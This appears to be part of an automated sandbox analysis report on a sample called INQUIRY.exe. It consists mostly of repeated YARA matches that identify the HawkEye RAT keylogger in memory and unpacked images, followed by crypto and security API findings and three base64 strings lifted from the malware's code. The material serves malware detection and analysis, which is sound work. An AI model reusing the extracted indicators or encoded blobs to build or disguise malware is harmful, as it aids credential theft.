                    Source: 0000000D.00000002.757155287.00000000026F7000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000000D.00000002.757155287.00000000026F7000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000021.00000002.924535204.00000000022F2000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000021.00000002.924535204.00000000022F2000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000001B.00000002.849044012.0000000002642000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000001B.00000002.849044012.0000000002642000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000010.00000002.824784026.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000010.00000002.824784026.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000001.00000002.737371268.0000000002302000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000001.00000002.737371268.0000000002302000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000001C.00000002.859836497.0000000002242000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000001C.00000002.859836497.0000000002242000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000021.00000002.919755783.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000021.00000002.919755783.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000000.00000002.656369760.00000000026D7000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000000.00000002.656369760.00000000026D7000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000010.00000002.826605147.0000000002492000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000010.00000002.826605147.0000000002492000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000001C.00000002.860072694.00000000022F2000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000001C.00000002.860072694.00000000022F2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000010.00000002.824923724.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000010.00000002.824923724.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000021.00000002.928494489.0000000002A21000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000021.00000002.928494489.0000000002A21000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000016.00000002.820474176.0000000005470000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000016.00000002.820474176.0000000005470000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB44.tmp.mdmp, type: DROPPEDMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB44.tmp.mdmp, type: DROPPEDMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B59.tmp.mdmp, type: DROPPEDMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B59.tmp.mdmp, type: DROPPEDMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER7CAE.tmp.mdmp, type: DROPPEDMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER7CAE.tmp.mdmp, type: DROPPEDMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 16.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 16.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 1.2.INQUIRY.exe.21e0000.1.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 1.2.INQUIRY.exe.21e0000.1.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 33.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 33.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 28.2.INQUIRY.exe.7a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 28.2.INQUIRY.exe.7a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 16.2.INQUIRY.exe.22e0000.1.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 16.2.INQUIRY.exe.22e0000.1.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 28.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 28.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 32.2.INQUIRY.exe.2680000.3.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 32.2.INQUIRY.exe.2680000.3.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 16.2.INQUIRY.exe.2370000.2.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 16.2.INQUIRY.exe.2370000.2.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 33.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 33.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 28.2.INQUIRY.exe.22f0000.3.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 28.2.INQUIRY.exe.22f0000.3.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 33.2.INQUIRY.exe.2210000.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 33.2.INQUIRY.exe.2210000.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 33.2.INQUIRY.exe.2210000.1.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 33.2.INQUIRY.exe.2210000.1.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 27.2.INQUIRY.exe.2640000.3.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 27.2.INQUIRY.exe.2640000.3.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 1.2.INQUIRY.exe.21e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 1.2.INQUIRY.exe.21e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 1.2.INQUIRY.exe.2300000.3.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 1.2.INQUIRY.exe.2300000.3.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 33.2.INQUIRY.exe.2380000.3.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 33.2.INQUIRY.exe.2380000.3.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 16.2.INQUIRY.exe.2490000.3.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 16.2.INQUIRY.exe.2490000.3.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0.2.INQUIRY.exe.25f0000.2.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0.2.INQUIRY.exe.25f0000.2.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 28.2.INQUIRY.exe.7a0000.1.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 28.2.INQUIRY.exe.7a0000.1.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 32.2.INQUIRY.exe.2630000.2.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 32.2.INQUIRY.exe.2630000.2.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 16.2.INQUIRY.exe.22e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 16.2.INQUIRY.exe.22e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 27.2.INQUIRY.exe.25e0000.2.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 27.2.INQUIRY.exe.25e0000.2.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 33.2.INQUIRY.exe.22f0000.2.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 33.2.INQUIRY.exe.22f0000.2.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 16.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 16.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 28.2.INQUIRY.exe.2240000.2.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 28.2.INQUIRY.exe.2240000.2.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 28.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 28.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 13.2.INQUIRY.exe.2660000.3.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 13.2.INQUIRY.exe.2660000.3.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 1.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 1.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 27.2.INQUIRY.exe.25e0000.2.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 27.2.INQUIRY.exe.25e0000.2.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 33.2.INQUIRY.exe.22f0000.2.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 33.2.INQUIRY.exe.22f0000.2.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 16.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 16.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 28.2.INQUIRY.exe.2240000.2.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 28.2.INQUIRY.exe.2240000.2.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 28.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 28.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 13.2.INQUIRY.exe.2660000.3.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 13.2.INQUIRY.exe.2660000.3.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 1.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 1.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, Form1.cs, Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, Form1.cs, Cryptographic APIs: 'CreateDecryptor'
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, Form1.cs, Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, Form1.cs, Cryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, Form1.csBase64 encoded string: 'V9z0MtEfK2EI50ruA/sX5435SES1SZRTR7cTqTnmp3AxYZifJxwgy7QFTKhlmSGx', 'xs2M8HBBKsXOBp/txdt4WH36BZtFcWtpatuDMJkzHUo9RE6HRhBOXZQPez9CEdmS', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                    Source: 13.2.INQUIRY.exe.2660000.3.unpack, Form1.cs, Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, Form1.cs, Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 1.2.INQUIRY.exe.2300000.3.unpack, Form1.cs, Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 28.2.INQUIRY.exe.2240000.2.unpack, Form1.cs, Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 1.2.INQUIRY.exe.400000.0.unpack, Form1.cs, Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 28.2.INQUIRY.exe.22f0000.3.unpack, Form1.cs, Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 28.2.INQUIRY.exe.400000.0.unpack, Form1.cs, Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, Form1.cs, Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 16.2.INQUIRY.exe.2370000.2.unpack, Form1.cs, Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 16.2.INQUIRY.exe.400000.0.unpack, Form1.cs, Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 27.2.INQUIRY.exe.2640000.3.unpack, Form1.cs, Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
